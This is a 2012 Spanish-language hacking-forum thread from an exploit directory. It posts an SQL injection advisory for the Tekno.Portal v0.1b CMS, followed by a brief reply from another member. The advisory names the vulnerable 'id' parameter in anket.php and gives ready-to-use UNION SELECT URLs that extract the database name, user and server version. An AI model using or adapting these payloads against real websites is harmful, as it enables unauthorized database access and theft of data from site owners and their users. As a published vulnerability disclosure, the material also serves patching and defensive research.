Comunidad Underground Hispana  

Retroceder   Comunidad Underground Hispana > Phreaking, Hacking y Seguridad > Bug y Exploits > Directorio de Exploits
Tekno.Portal 'anket.php' SQLi Vulnerability by Socket_0x03 Tekno.Portal 'anket.php' SQLi Vulnerability by Socket_0x03
Registrarse Ayuda Reportar SPAM Calendario Marcar Foros Como Leídos


Respuesta Crear Nuevo Tema
 
Compartir en twitter LinkBack Herramientas Desplegado
Antiguo 30-jul-2012, 12:34   #1
Habitual
 
Avatar de Socket_0x03
 
Fecha de Ingreso: mayo-2007
Ubicación: Miami.
Amigos 10
Mensajes: 208
Gracias: 13
Agradecido 52 veces en 33 mensajes.
Thumbs up Tekno.Portal 'anket.php' SQLi Vulnerability by Socket_0x03
Código:

               ======================================================
               Tekno.Portal v0.1b - SQLi Vulnerability in "anket.php" 
               ======================================================


____________________________________________________________________________________


 # Exploit Title: Tekno.Portal v0.1b - SQLi Vulnerability in "anket.php" 

 # Date: [07-25-2012]

____________________________________________________________________________________


 # Author: Socket_0x03 (Alvaro J. Gene)

 # Email: 

  




  

    
    

    [Solo usuarios registrados pueden 
    ver los links. 
    REGISTRARSE]


  



  




 # Website: www.teraexe.com 

____________________________________________________________________________________

 # Software Link: http://sourceforge.net/projects/teknoportal

 # Vulnerable Application: Tekno.Portal

 # Version: 0.1b

 # Vulnerable File: anket.php (parameter id)

 # Language: This application is available only in turkish language.

 # Product Description: Tekno.Portal is a content management system (CMS) developed 
   in PHP; furthermore, a webmaster can use this application to manage files, store
   data, and more. 
   
____________________________________________________________________________________


 # SQL Injection: 
 
   http://www.website.com/teknoportal/anket.php?id=[SQLi]

 # Examples of SQLi: 

   http://www.website.com/teknoportal/anket.php?id=-1+union+select+1,2,3,database(),5
   http://www.website.com/teknoportal/anket.php?id=-1+union+select+1,2,3,user(),5
   http://www.website.com/teknoportal/anket.php?id=-1+union+select+1,2,3,@@version,5

 # More:
   www.securityfocus.com/bid/54698

____________________________________________________________________________________
__________________
Socket_0x03 está desconectado   Responder Citando
El Siguiente Usuario Agradeció a Socket_0x03 Por Este Mensaje:
cuban (30-jul-2012)
Antiguo 02-ago-2012, 18:47   #2
Yes! I am invincible!
 
Avatar de Doddy
 
Fecha de Ingreso: febrero-2009
Ubicación: Infierno
Amigos 32
Mensajes: 2.411
Gracias: 0
Agradecido 157 veces en 113 mensajes.
Predeterminado Respuesta: Tekno.Portal 'anket.php' SQLi Vulnerability by Socket_0x03
me acuerdo que hace un tiempo yo siempre quise encontrar una SQLi y publicarla pero todo cambio cuando me enamore totalmente de la programacion xDD.
__________________
Doddy está desconectado   Responder Citando
El Siguiente Usuario Agradeció a Doddy Por Este Mensaje:
cuban (03-ago-2012)
Respuesta

« VLC MMS Stream Handling Buffer Overflow | ActFax 4.31 Local Privilege Escalation Exploit »
Herramientas
Desplegado
Mode Lineal Mode Lineal

Normas de Publicación
No puedes crear nuevos temas
No puedes responder mensajes
No puedes subir archivos adjuntos
No puedes editar tus mensajes
Los Códigos BB están Activado
Las Caritas están Activado
[IMG] está Activado
El Código HTML está Desactivado
Trackbacks están Activado
Pingbacks están Activado
Refbacks están Activado


Temas Similares
Tema Autor Foro Respuestas Último mensaje
SpamTitan Application v5.08x - SQL Injection Vulnerability Doddy Directorio de Exploits 0 24-ene-2012 18:46


Contáctenos - Comunidad Underground Hispana - Arriba

Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2013, Jelsoft Enterprises Ltd.
SEO by vBSEO 3.6.0